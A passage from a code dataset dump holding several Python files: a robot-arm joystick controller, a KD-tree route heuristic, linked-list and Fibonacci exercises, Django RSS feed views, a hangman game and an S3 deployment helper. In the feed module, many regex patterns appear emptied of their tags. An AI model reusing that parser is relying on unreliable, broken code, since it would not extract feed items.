= True\n else:\n wrist_mv = False\n wrist_mv_opp = False\n\n #gripper - Left trigger open, right trigger close\n if joystick.get_axis(2) < -.5:\n gripper_mv = True\n elif joystick.get_axis(5) < -.5:\n gripper_mv_opp = True\n else:\n gripper_mv = False\n gripper_mv_opp = False\n \n #exit program if start button pressed\n if joystick.get_button(7):\n running = False\n \n #move base\n if base_mv and servo_pos[0] <= 100:\n servo_pos[0] += b_mv\n servos[0].ChangeDutyCycle(convert(servo_pos[0]))\n elif base_mv_opp and servo_pos[0] >= -15:\n servo_pos[0] -= b_mv\n servos[0].ChangeDutyCycle(convert(servo_pos[0]))\n\n #Shoulders - left stick, up/down\n if shoulder_mv and servo_pos[1] <= 130:\n servo_pos[1] += s_mv\n servos[1].ChangeDutyCycle(convert(servo_pos[1]))\n elif shoulder_mv_opp and servo_pos[1] >= 0:\n servo_pos[1] -= s_mv\n servos[1].ChangeDutyCycle(convert(servo_pos[1]))\n\n #elbow - right stick, up/down\n if elbow_mv and servo_pos[2] <= 100:\n servo_pos[2] += e_mv\n servos[2].ChangeDutyCycle(convert(servo_pos[2]))\n elif elbow_mv_opp and servo_pos[2] >= 0:\n servo_pos[2] -= e_mv\n servos[2].ChangeDutyCycle(convert(servo_pos[2]))\n\n #wrist joint - A and Y, A down Y up\n if swivel_mv and servo_pos[3] <= 170:\n servo_pos[3] += sw_mv\n servos[3].ChangeDutyCycle(convert(servo_pos[3]))\n elif swivel_mv_opp and servo_pos[3] >= 10:\n servo_pos[3] -= sw_mv\n servos[3].ChangeDutyCycle(convert(servo_pos[3]))\n\n #wrist swivel - RB and LB, RB left (CCW) LB right (CW)\n if wrist_mv and servo_pos[4] <= 180:\n servo_pos[4] += w_mv\n servos[4].ChangeDutyCycle(convert(servo_pos[4]))\n elif wrist_mv_opp and servo_pos[4] >= 0:\n servo_pos[4] -= w_mv\n servos[4].ChangeDutyCycle(convert(servo_pos[4]))\n\n #gripper - Left trigger open, right trigger close\n if gripper_mv and servo_pos[5] <= 170:\n servo_pos[5] += g_mv\n servos[5].ChangeDutyCycle(convert(servo_pos[5]))\n elif gripper_mv_opp and servo_pos[5] >= 0:\n servo_pos[5] -= g_mv\n servos[5].ChangeDutyCycle(convert(servo_pos[5]))\n\n \n #set clock speed to limit cpu usage\n CLOCK.tick(clock_speed)\n \n#end program\nstop()\n\n","sub_path":"robo_arm.py","file_name":"robo_arm.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"442411170","text":"# Val Chapple\n# Cody Dhein\n# Date: Nov 22, 2017\n#\n# Resources:\n# Overall Concepts: An introductory tutorial on kd trees by Andrew W Moore\n# Carnegie Mellon University, Extract from Andrew Moore's PhD Thesis\n# Construction: https://www.cise.ufl.edu/class/cot5520fa09/CG_RangeKDtrees.pdf\n# Querying: https://web.engr.oregonstate.edu/~tgd/classes/534/slides/part3.pdf\n#\nimport sys\nfrom operator import itemgetter\n\n#import random\nimport heapq\nimport math\nimport timeit\nimport numpy as np\n\n# KDTreeNN\n#\n# Build KDTree from city data points\n# Use Tree to find solution\ndef kdTreeNN(filename, outfilename):\n # Read file with city Id, city x, and city y\n try:\n inFile = open(filename, \"r\")\n except:\n print(\"No file named: \" + filename)\n sys.exit()\n\n text = inFile.read().splitlines()\n\n # Save data as 2D list [ [ id, x, y ],... ]\n points = [ [int(i[0]), int(i[1]), int(i[2])] for i in [j.split() for j in text ]]\n\n # Create kd-tree structure with points, 0 start depth, and 2D(x and y)\n root = kDTree( points, 0, 2)\n\n # Set Max number of Nearest Neighbors to Keep\n numNN = len(points) * .002\n if (numNN < 10):\n numNN = 10\n\n (totalDist, route, distSqdMatrix) = kDTreeSearchNN(root, len(points), numNN)\n\n # if (len(points) <= 400 ):\n # (totalDist, route) = twoOptImprove(route , distSqdMatrix)\n\n # Save route\n outFile = open(outfilename, \"w\")\n outFile.write(str(totalDist) + \"\\n\")\n for i in route:\n outFile.write(str(i.city[0]) + \"\\n\")\n return\n\n# kDNode\n# Nodes of trees\n# value is the city\n# left and right point to other nodes\n# dim represents the splitting axis (aka index to use on the city data)\nclass kDNode:\n def __init__(self, city, left, right, dim):\n self.city = city\n self.visited = False\n self.left = left\n self.right = right\n self.dim = dim # 0 or 1\n self.nn = []\n\n def addNN( self, distSqd, node, maxNN ):\n if ( distSqd, node ) in self.nn:\n return\n if len(self.nn) < maxNN:\n self.nn.append( ( distSqd, node ) )\n else:\n self.nn.sort(key=itemgetter(0), reverse=True)\n if (self.nn[0][0] > distSqd):\n # Replace largest dist with dist\n self.nn[0] = ( distSqd, node )\n\n def getNNs( self ):\n return [ x for x in self.nn ]\n\n def __str__(self, level=1):\n ret = \"\"\n ret += \"\\t\"*(level-1)+\"-----\"+repr(self.city[0])+\"\\n\"\n if self.left != None:\n ret += self.left.__str__(level+1)\n if self.right != None:\n ret += self.right.__str__(level+1)\n return ret\n\n\n# kDTree\n# Creates kd-tree recursively with city data, depth into tree and dimensions (k)\n# Returns a kDNode and its subtree\ndef kDTree( points, depth, k ):\n # Check that points has a list\n if len(points) < 1:\n return None\n\n # sort by axis chosen to find median:\n # even for x= equation, and odd for y= equation\n points.sort(key=itemgetter(depth % k + 1))\n mid = len(points) / 2\n\n return kDNode(\n points[mid],\n kDTree(points[:mid], depth + 1, k),\n kDTree(points[mid+1:], depth + 1, k),\n depth % k + 1\n )\n\n# kDTreeSearchNN\n# Determines a tour distance and route\n# Uses greedy method of finding nearest unvisited city to target city\ndef kDTreeSearchNN( tree, numCities, maxNN ):\n start = tree\n target = tree\n tree.visited = True\n route = [ tree ]\n totalDist = 0\n\n distSqdMatrix = [[ -1 for i in range(0,numCities)] for j in range(0,numCities)]\n\n # Find nearest city for entire loop\n while len(route) < numCities:\n #print(str(len(route)) + \" \" + str(numCities))\n heap = []\n bestDistSqd = float('inf')\n bestNode = None\n\n # Add to priority queue\n heapq.heappush( heap, (0 , tree ) )\n # Get target's nearest neighbors\n bestSumDists = float('inf')\n while len(heap) != 0:\n (d, node) = heapq.heappop( heap )\n if (d >= bestDistSqd):\n continue # No node is closer, continue while loop\n if node == None:\n continue # Skip node\n\n # Get distance squared value for comparison\n dist = distSqdMatrix[ node.city[0] ][ target.city[0] ]\n\n if dist == -1:\n dist = dist_sqd( node.city, target.city )\n distSqdMatrix[ target.city[0] ][ node.city[0] ] = dist\n distSqdMatrix[ node.city[0] ][ target.city[0] ] = dist\n target.addNN( dist , node, maxNN)\n\n if node.visited == False:\n if (dist < bestDistSqd ):\n bestDistSqd = dist\n bestNode = node\n\n # Add child nodes to priority queue, adjusting priority left/right\n if (target.city[node.dim] <= node.city[node.dim]):\n heapq.heappush(heap, (0, node.left ))\n heapq.heappush(heap, (dist, node.right )) # sorting by dist?\n else:\n heapq.heappush(heap, (0, node.right ))\n heapq.heappush(heap, (dist, node.left ))\n\n # Add nearest neighbor to route, mark visited, update target\n if bestNode != None:\n bestNode.visited = True\n route.append(bestNode)\n target = bestNode\n totalDist += int(round(math.sqrt(bestDistSqd)))\n\n # Add distance from last target city to start city\n totalDist += int(round(math.sqrt(dist_sqd(target.city, start.city))))\n return (totalDist, route, distSqdMatrix)\n\ndef dist_sqd( city1, city2 ):\n x_dist = abs(city2[1] - city1[1])\n y_dist = abs(city2[2] - city1[2])\n return x_dist*x_dist + y_dist*y_dist\n\n# swaps edges\n# accepts the full route and the indices for two nodes to swap\ndef twoOptSwap(route,i,j):\n\tnew_route = route[:i]\n\ttmp = list(reversed(route[i:j+1]))\n\tnew_route.extend(tmp)\n\tnew_route.extend(route[j+1:])\n\treturn new_route\n\n# Performs a twoOpt improvement on the candidate solution\ndef twoOptImprove(route,distances):\n noSwap = route[0]\n currentBest = calcLength(route,distances)\n prevBest = currentBest + 1\n n = 0\n while currentBest < prevBest:\n n += 1\n #print(str(n))\n prevBest = currentBest\n for i in range(1,len(route)-2):\n for j in range(i+1,len(route)-1):\n #print 'Try swap ' + str(route[i]) + ', ' + str(route[j])\n candidate = twoOptSwap(route,i,j)\n candidate_dist = calcLength(candidate,distances)\n if candidate_dist < currentBest:\n route = candidate\n currentBest = candidate_dist\n #break\n # else:\n\t\t\t# \tcontinue\n # break\n currentBest = calcLength(route,distances)\n return (currentBest, route )\n\n# calculates total length of the given tour\n# accepts the tour and a distance Matrix\ndef calcLength(tour, dists):\n length = 0\n\n for i in range(len(tour)-1):\n j = i+1\n c1 = tour[i]\n c2 = tour[j]\n length += int(round(math.sqrt(dists[c1][c2])))\n length += int(round(math.sqrt(dists[ tour[0] ][ tour[len(tour)-1] ] )))\n return length\n\n\nif __name__ == '__main__':\n t1= timeit.default_timer()\n # Check input file name exists\n try:\n filename = sys.argv[1]\n except:\n print(\"Usage: \" + sys.argv[0] + \" \")\n sys.exit()\n #random.seed(1)\n outfilename = filename + \".tour\"\n kdTreeNN(filename, outfilename)\n\n t2 = timeit.default_timer()\n\n fileWrite = open(filename + \".tourTime\", \"w\")\n fileWrite.write(str(t2-t1) + \"\\n\")\n fileWrite.close()\n","sub_path":"NN_KDTree/KDTree-FAST-results/KDTree-FAST.py","file_name":"KDTree-FAST.py","file_ext":"py","file_size_in_byte":7694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"85178183","text":"class Node:\n def __init__(self, value=None, next=None):\n self.value = value\n self.next = next\n\n def get_value(self):\n return self.value\n\n def get_next(self):\n return self.next\n\n def set_next(self, new_next):\n self.next = new_next\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n # self.tail = None\n\n def add_to_head(self, value):\n node = Node(value)\n\n if self.head is not None:\n node.set_next(self.head)\n self.head = node\n\n def add_to_tail(self, value):\n node = Node(value)\n\n if self.tail is not None:\n self.tail.next = node\n self.tail = node\n\n def contains(self, value):\n if not self.head:\n return False\n\n current = self.head\n\n while current:\n if current.get_value() == value:\n return True\n\n current = current.get_next()\n\n return False\n\n # def reverse_list(self, node, prev): what the _ is prev????\n def reverse_list(self, node, prev):\n marker1 = None\n marker2 = self.head\n \n while marker2 is not None:\n marker3 = marker2.next\n marker2.next = marker1\n marker1 = marker2\n marker2 = marker3\n self.head = marker1\n\n def reverse_recursive_list(self, node, prev):\n if self.head is None:\n return\n cascade = False\n next = None\n \n if node.next is None: \n self.head = node\n cascade = True\n next = node.next\n node.next = prev\n\n if cascade == True:\n return\n self.reverse_recursive_list(next, node)\n \n\nmyLL = LinkedList()\nmyLL.add_to_head(1)\nmyLL.add_to_head(2)\nmyLL.add_to_head(3)\nmyLL.add_to_head(4)\nmyLL.add_to_head(5)\nmyLL.reverse_recursive_list(myLL.head, None)\n","sub_path":"reverse/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"585728495","text":"#coding:utf-8\n\n\"\"\"\n斐波那契数列\n\"\"\"\n\nclass Fabs:\n def __init__(self,max):\n self.max = max\n self.a = 0\n self.b = 1\n\n def __iter__(self):\n return self\n\n def __index__(self):\n Fabs = self.a\n if Fabs > self.max:\n raise StopIteration\n self.a,self.b = self.b,self.a+self.b\n return Fabs\n\nf = Fabs(10000)\nlst = [f.__index__() for i in range(10)]\nprint(lst)\n\n","sub_path":"迭代器方式计算斐波那契数列.py","file_name":"迭代器方式计算斐波那契数列.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"509265685","text":"import cgitb\nimport configparser\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom pymongo import MongoClient\nimport mwfeeds.controlers.ParseFeed\nimport mwfeeds.controlers.GetRegionFixFeed\nimport mwfeeds.controlers.GetJavascriptPage\nimport urllib\nimport urllib.request\nimport re\nimport json\n\ncgitb.enable()\nconfig = configparser.ConfigParser()\nconfig.read('/opt/python/current/app/mwfeeds/mwfeeds.cfg')\n\ndef index(req):\n c = {}\n id = req.GET.get('id', '')\n if id == '':\n c[\"message\"] = \"Invalid Feed Id\"\n return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n else:\n client = MongoClient(config.get(\"active\", \"DBUrl\"))\n db = client.mwfeeds\n feedsCollection = db.feeds\n myFeed = feedsCollection.find_one({\"_id\":int(id.strip())})\n if myFeed[\"feedType\"] == \"HTML\":\n return getHTMLFeed(req, myFeed)\n elif myFeed[\"feedType\"] == \"SetEncoding\":\n return getSetEncodingFeed(req, myFeed)\n elif myFeed[\"feedType\"] == \"Sharepoint\":\n return getFeedSharepoint(req, myFeed)\n elif myFeed[\"feedType\"] == \"Combine\":\n return getCombineFeed(req, myFeed)\n elif myFeed[\"feedType\"] == \"RegionFix\" or myFeed[\"feedType\"] == \"Region Fix\":\n return mwfeeds.controlers.GetRegionFixFeed.processFeed(req,myFeed)\n #c[\"message\"] = \"Region Fix Feed\"\n #return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n else:\n c[\"message\"] = \"Feed type \" + myFeed[\"feedType\"] + \" is not supported.\"\n return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n\ndef getHTMLFeed(req,myFeed):\n c = {}\n try:\n HTMLSource = \"\"\n if myFeed[\"javascriptEnabled\"] == True:\n HTMLSource = mwfeeds.controlers.GetJavascriptPage.getJavascriptPage(myFeed[\"url\"])\n else:\n fp = urllib.request.urlopen(myFeed[\"url\"])\n mybytes = fp.read()\n HTMLSource = mybytes.decode(\"utf8\")\n myFeed[\"HTMLSourceText\"] = HTMLSource\n try:\n c[\"CustomTitle\"] = myFeed[\"CustomTitle\"]\n except:\n c[\"CustomTitle\"] = \"\"\n try:\n c[\"CustomDescription\"] = myFeed[\"CustomDescription\"]\n except:\n c[\"CustomDescription\"] = \"\"\n c[\"ItemList\"] = mwfeeds.controlers.ParseFeed.parseFeed(myFeed)\n return render(req, \"RSSTemplate.pyv\", c, content_type=\"text/xml\")\n except Exception as ex:\n c[\"message\"] = str(ex)\n return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n\ndef getSetEncodingFeed(req,myFeed):\n try:\n myHeaders = {'User-Agent': \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0\"}\n request = urllib.request.Request(myFeed[\"url\"], headers=myHeaders)\n source = \"\"\n with urllib.request.urlopen(request) as response:\n encoding = response.headers.get_content_charset()\n if encoding is not None:\n source = response.read().decode(encoding)\n else:\n source = response.read().decode(\"ISO-8859-1\")\n rssText = re.sub(\"(\\<\\?xml(?:.+?)\\?\\>)\",\"\",source)\n returnValue = \"\"\n try:\n returnValue += rssText.encode('utf-8')\n except:\n returnValue += rssText\n c={}\n c[\"message\"] = returnValue\n return HttpResponse(rssText, content_type=\"text/xml\")\n except Exception as ex:\n c={}\n c[\"message\"] = str(ex)\n return render(req, \"GetFeedMessage.pyv\", c, content_type=\"application/rss+xml\")\n\ndef getFeedSharepoint(req,myFeed):\n c = {}\n try:\n c[\"BaseUrl\"] = config.get(\"active\", \"baseUrl\")\n c[\"CustomTitle\"] = myFeed[\"CustomTitle\"]\n c[\"CustomDescription\"] = myFeed[\"CustomDescription\"]\n c[\"id\"] = myFeed[\"_id\"]\n itemList = []\n fp = urllib.request.urlopen(myFeed[\"url\"])\n mybytes = fp.read()\n source = mybytes.decode(\"utf8\")\n allItems = re.findall(\"(.+?)\", source, re.DOTALL | re.IGNORECASE)\n for thisItem in allItems:\n thisItem = thisItem.replace(\"[<\", \"[\").replace('&amp;','&').replace('&','&').replace('amp;','&')\n itemToAdd = {}\n itemToAdd[\"Title\"] = re.findall(\"<!\\[CDATA\\[(.+?)\\]\\]>\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"Title\"]) == 0):\n itemToAdd[\"Title\"] = re.findall(\"(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"Title\"] = flatten(itemToAdd[\"Title\"])\n\n itemToAdd[\"ItemURL\"] = re.findall(\"(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n try:\n itemToAdd[\"ItemURL\"] = flatten(itemToAdd[\"ItemURL\"])\n except:\n itemToAdd[\"ItemURL\"] = flatten(itemToAdd[\"ItemURL\"])\n \n\n itemToAdd[\"date\"] = re.findall(\"(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"date\"]) == 0):\n itemToAdd[\"date\"] = re.findall(\"<(?:.*?)date>(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"date\"] = flatten(itemToAdd[\"date\"])\n itemToAdd[\"Description\"] = re.findall(\"\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"Description\"]) == 0):\n itemToAdd[\"Description\"] = re.findall(\"<(?:.*?)description>(.+?)\", thisItem,\n re.DOTALL | re.IGNORECASE)\n itemToAdd[\"Description\"] = flatten(itemToAdd[\"Description\"])\n itemToAdd[\"SourceURL\"] = re.findall(\"\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"SourceURL\"]) == 0):\n itemToAdd[\"SourceURL\"] = re.findall(\"(.*?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"SourceURL\"] = flatten(itemToAdd[\"SourceURL\"])\n itemToAdd[\"SourceName\"] = re.findall(\"(.*?)\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"SourceName\"]) == 0):\n itemToAdd[\"SourceName\"] = re.findall(\"(.*?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"SourceName\"] = flatten(itemToAdd[\"SourceName\"])\n itemList.append(itemToAdd)\n c[\"ItemList\"] = itemList\n return render(req, \"SharepointRSSTemplate.pyv\", c, content_type=\"text/xml\")\n except Exception as ex:\n c[\"message\"] = str(ex)\n return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n\ndef getCombineFeed(req,myFeed):\n c = {}\n try:\n sourceFeeds = myFeed[\"sourceFeeds\"]\n c[\"BaseUrl\"] = config.get(\"active\", \"baseUrl\")\n c[\"id\"] = myFeed[\"_id\"]\n itemList = []\n for o in sourceFeeds:\n fp = urllib.request.urlopen(o)\n mybytes = fp.read()\n CombineSource = mybytes.decode(\"utf8\")\n strainedItems = re.findall(\"(.+?)\", CombineSource,re.DOTALL|re.IGNORECASE)\n for thisItem in strainedItems:\n thisStrainedItem = str(thisItem)\n itemToAdd = {}\n itemToAdd[\"TitleA\"] = re.findall(\"<!\\[CDATA\\[(.+?)\\]\\]>\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"TitleA\"]) == 0):\n itemToAdd[\"TitleA\"] = re.findall(\"(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"ItemURL\"] = \"\"\n itemToAdd[\"ItemURLA\"] = re.findall(\"\",thisStrainedItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"ItemURLA\"]) == 0):\n itemToAdd[\"ItemURLA\"] = re.findall(\"(.+?)\", thisStrainedItem,re.DOTALL | re.IGNORECASE)\n itemToAdd[\"SourceName\"] = \"\"\n itemToAdd[\"SourceNameA\"] = re.findall(\"(.+?)\",thisStrainedItem,re.DOTALL|re.IGNORECASE)\n itemToAdd[\"SourceURL\"] = \"\"\n itemToAdd[\"SourceURLA\"] = re.findall(\"\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"SourceURLA\"]) == 0):\n itemToAdd[\"SourceURLA\"] = re.findall(\"(.*?)\", thisItem,re.DOTALL | re.IGNORECASE)\n itemToAdd[\"Date\"] = \"\"\n itemToAdd[\"DateA\"] = re.findall(\"(.+?)\", thisStrainedItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"DateA\"] = flatten(itemToAdd[\"Date\"])\n if (len(itemToAdd[\"DateA\"]) == 0):\n itemToAdd[\"Date\"] = re.findall(\"<(?:.*?)Date>(.+?)\", thisItem,re.DOTALL | re.IGNORECASE)\n itemToAdd[\"DateA\"] = flatten(itemToAdd[\"Date\"])\n\n\n itemToAdd[\"Description\"] = \"\"\n itemToAdd[\"DescriptionA\"] = re.findall(\"\", thisStrainedItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"DescriptionA\"]) == 0):\n itemToAdd[\"DescriptionA\"] = re.findall(\"(.+?)\", thisStrainedItem, re.DOTALL | re.IGNORECASE)\n if isinstance(itemToAdd[\"TitleA\"], list):\n if len(itemToAdd[\"TitleA\"])>0:\n itemToAdd[\"Title\"] = itemToAdd[\"TitleA\"][0]\n else:\n itemToAdd[\"Title\"] = \"\"\n else:\n itemToAdd[\"Title\"] = itemToAdd[\"TitleA\"]\n if isinstance(itemToAdd[\"ItemURLA\"], list):\n if len(itemToAdd[\"ItemURLA\"])>0:\n itemToAdd[\"ItemURL\"] = itemToAdd[\"ItemURLA\"][0]\n else:\n itemToAdd[\"ItemURL\"] = \"\"\n else:\n itemToAdd[\"ItemURL\"] = itemToAdd[\"ItemURLA\"]\n if isinstance(itemToAdd[\"SourceNameA\"], list):\n if len(itemToAdd[\"SourceNameA\"])>0:\n itemToAdd[\"SourceName\"] = itemToAdd[\"SourceNameA\"][0]\n else:\n itemToAdd[\"SourceName\"] = \"\"\n else:\n itemToAdd[\"SourceName\"] = itemToAdd[\"SourceNameA\"]\n if isinstance(itemToAdd[\"SourceURLA\"], list):\n if len(itemToAdd[\"SourceURLA\"])>0:\n itemToAdd[\"SourceURL\"] = itemToAdd[\"SourceURLA\"][0]\n else:\n itemToAdd[\"SourceURL\"] = \"\"\n else:\n itemToAdd[\"SourceURL\"] = itemToAdd[\"SourceURLA\"]\n \n if isinstance(itemToAdd[\"DateA\"], list):\n if (len(itemToAdd[\"DateA\"])>0):\n itemToAdd[\"Date\"] = itemToAdd[\"DateA\"][0]\n else:\n itemToAdd[\"Date\"] = \"\"\n else:\n itemToAdd[\"Date\"] = itemToAdd[\"DateA\"]\n\n if isinstance(itemToAdd[\"DescriptionA\"], list):\n if len(itemToAdd[\"DescriptionA\"])>0:\n itemToAdd[\"Description\"] = itemToAdd[\"DescriptionA\"][0]\n else:\n itemToAdd[\"Description\"] = \"\"\n else:\n itemToAdd[\"Description\"] = itemToAdd[\"DescriptionA\"]\n itemList.append(itemToAdd)\n c[\"ItemList\"] = itemList\n return render(req, \"CombineRSSTemplate.pyv\", c, content_type=\"text/xml\")\n except Exception as ex:\n c[\"message\"] = str(ex)\n return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n\ndef flatten(arrayIn):\n if len(arrayIn)>0 :\n return arrayIn[0]\n else:\n return \"\"\n\n\n\n\n\n\n","sub_path":"mwfeeds/controlers/GetFeed.py","file_name":"GetFeed.py","file_ext":"py","file_size_in_byte":11946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60607136","text":"#Store Hangman game into a function\nimport random\n\ndef hangman():\n\tword = [\"test\", \"idea\", \"something\", \"else\", \"random\", \"things\"]\n\tword = random.choice(word)\n\n\twrong = 0\n\tstages = [\"\",\n\t\t\t\"--------- \",\n\t\t\t\"| | \",\n\t\t\t\"| | \",\n\t\t\t\"| 0 \",\n\t\t\t\"| /|\\\\ \",\n\t\t\t\"| / \\\\ \",\n\t\t\t\"| \"\n\t\t\t]\n\tremaining_letters = list(word)\n\tboard = [\"_\"] * len(word)\n\twin = False\n\tprint(\"Welcome to Hangman\")\n\t\n\twhile wrong < len(stages) - 1:\n\t\tprint(\"\\n\")\n\t\tmsg = \"Guess a letter: \"\n\t\tchar = input(msg)\n\t\tif char in remaining_letters:\n\t\t\tcind = remaining_letters.index(char)\n\t\t\tboard[cind] = char\n\t\t\tremaining_letters[cind] = '$'\n\t\telse:\n\t\t\twrong += 1\n\t\tprint((\" \".join(board)))\n\t\te = wrong + 1\n\t\tprint(\"\\n\".join(stages[0: 3]))\n\t\tif \"_\" not in board:\n\t\t\tprint(\"You win!\")\n\t\t\tprint(\" \".join(board))\n\t\t\twin = True\n\t\t\tbreak\n\tif not win:\n\t\tprint(\"\\n\".join(stages[0: wrong]))\n\t\tprint(\"You lose! It was {}.\".format(word))\n\nhangman()\n\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"404910387","text":"import os\nimport boto3\nimport mimetypes\nfrom botocore.config import Config\n\n\ndef run():\n bucket = os.environ['INPUT_BUCKET']\n bucket_region = os.environ['INPUT_BUCKET-REGION']\n dist_folder = os.environ['INPUT_DIST-FOLDER']\n\n configuration = Config(region_name=bucket_region)\n\n # s3_client = boto3.client('s3', config=configuration)\n\n # for root, subdirs, files in os.walk(dist_folder):\n # for file in files:\n # s3_client.upload_file(\n # os.path.join(root, file),\n # bucket,\n # os.path.join(root, file).replace(dist_folder + '/', ''),\n # ExtraArgs={\"ContentType\": mimetypes.guess_type(file)[0]}\n # )\n\n website_url = f'http://{bucket}.s3-website-{bucket_region}.amazonaws.com'\n # The below code sets the 'website-url' output (the old ::set-output syntax isn't supported anymore - that's the only thing that changed though)\n with open(os.environ['GITHUB_OUTPUT'], 'a') as gh_output:\n print(f'web-url={website_url}', file=gh_output)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":".github/actions/deploy-s3-docker/deployment.py","file_name":"deployment.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"583815220","text":"from django.core.paginator import Paginator\n\n\nclass PaginatorMixin():\n queryset = None\n per_page = None\n filterset = None\n request = None\n\n def __init__(self, queryset, filterset, request):\n \"\"\"Initialization\"\"\"\n self.queryset = queryset\n self.filterset = filterset\n self.request = request\n\n def set_per_page(self, per_page):\n \"\"\"Set the number of rows per page\"\"\"\n self.per_page = per_page\n\n def get_queryset(self):\n \"\"\"Get the filtered queryset\"\"\"\n return self.filterset(self.request.GET, queryset=self.queryset)\n\n def get_page(self):\n \"\"\"Get the page number from request and remove the page\n query string\"\"\"\n page = self.request.GET.get('page')\n request_without_page = self.request.GET.copy()\n if page:\n request_without_page.pop('page')\n self.request.GET = request_without_page \n return page\n\n def get_paginator(self):\n \"\"\"Get the filtered list and paginator resources\"\"\"\n object_list = self.get_queryset()\n paginator = Paginator(object_list.qs, self.per_page)\n page = self.get_page()\n\n object_list._qs = paginator.get_page(page)\n\n page_range = range(1, paginator.num_pages +1)\n page_list = list(page_range)\n\n return {'object_list': object_list, 'page_list': page_list, 'request': self.request}","sub_path":"intranet/core/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"234027627","text":"#!/usr/bin/env python\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# QEcalc by DANSE Inelastic group\n# Nikolay Markovskiy\n# California Institute of Technology\n# (C) 2009 All Rights Reserved\n#\n# File coded by: Nikolay Markovskiy\n#\n# See AUTHORS.txt for a list of people who contributed.\n# See LICENSE.txt for license information.\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nimport os.path\nimport StringIO\n\nclass SubSetting:\n def __init__(self): pass\n\nclass Setting:\n def __init__(self, filename = None, configString = None):\n self._paths = SubSetting()\n try:\n if filename == None:\n if configString == None:\n raise NameError(\"Config should be initialized either with a \\\n filename or configString\")\n else:\n self.filename = None #StringIO.StringIO(configString)\n self.configString = configString\n else:\n self.filename = filename\n self.configString = open(filename,'r').read()\n except NameError:\n raise \n\n \n def section(self, sectionName, configDic = {}):\n \"\"\"\n will parse self.configFileName values not found in the file will be\n initialized from configDic\n \"\"\"\n import ConfigParser\n config = ConfigParser.SafeConfigParser()\n config.optionxform = str\n \n file = StringIO.StringIO(self.configString)\n config.readfp(file)\n \n if not config.has_section(sectionName):\n config.add_section(sectionName)\n\n for varName in configDic.keys():\n if varName not in dir(self):\n setattr(self, varName, configDic[varName])\n\n for option in config.options(sectionName):\n varValue = config.get(sectionName, option)\n setattr(self, option, varValue)\n\n Vars = dir(self)\n for varName in Vars:\n if 'input' in varName or 'Input' in varName:\n if os.path.isfile(varName):\n file = open(varName, 'r')\n string = file.read()\n setattr(self, '_'+varName+'Str', string)\n\n def set(self, name, value):\n setattr(self, name, value)\n\n def get(self, name):\n if name in dir(self) and getattr(self,name) != None:\n return getattr(self,name)\n else:\n if name in dir(self._paths):\n return getattr(self._paths, name)\n else:\n return None\n\n def syncAllPathsInNamelist(self, param, namelist, varName, input, defaults = None):\n \"\"\"\n Syncs path attribute in namelist with setting variable varName\n if varName was not set in Setting it will be initialized from QE\n input. If it is not in QE input it will be initialized from QE default\n values\n \"\"\"\n var = getattr(self, varName, None)\n if var != None:\n input.namelist(namelist).add(param, var, quotes = True)\n setattr(self._paths, varName, var)\n else:\n if input.namelist(namelist).exists(param):\n inputVar = input.namelist(namelist).param(param, quotes = False)\n setattr(self, varName, inputVar)\n setattr(self._paths, varName, inputVar)\n else:\n setattr(self, varName, defaults[varName])\n setattr(self.setting._paths, varName, defaults[varName])\n\n def getAllPathsInNamelist(self, param, namelist, varName, input, defaults = None):\n \"\"\"\n Retrieves all the filenames relevant to given namelist. Variables\n from class Setting override ones from QE input files. If both are\n empty, default values are used\n \"\"\"\n var = getattr(self, 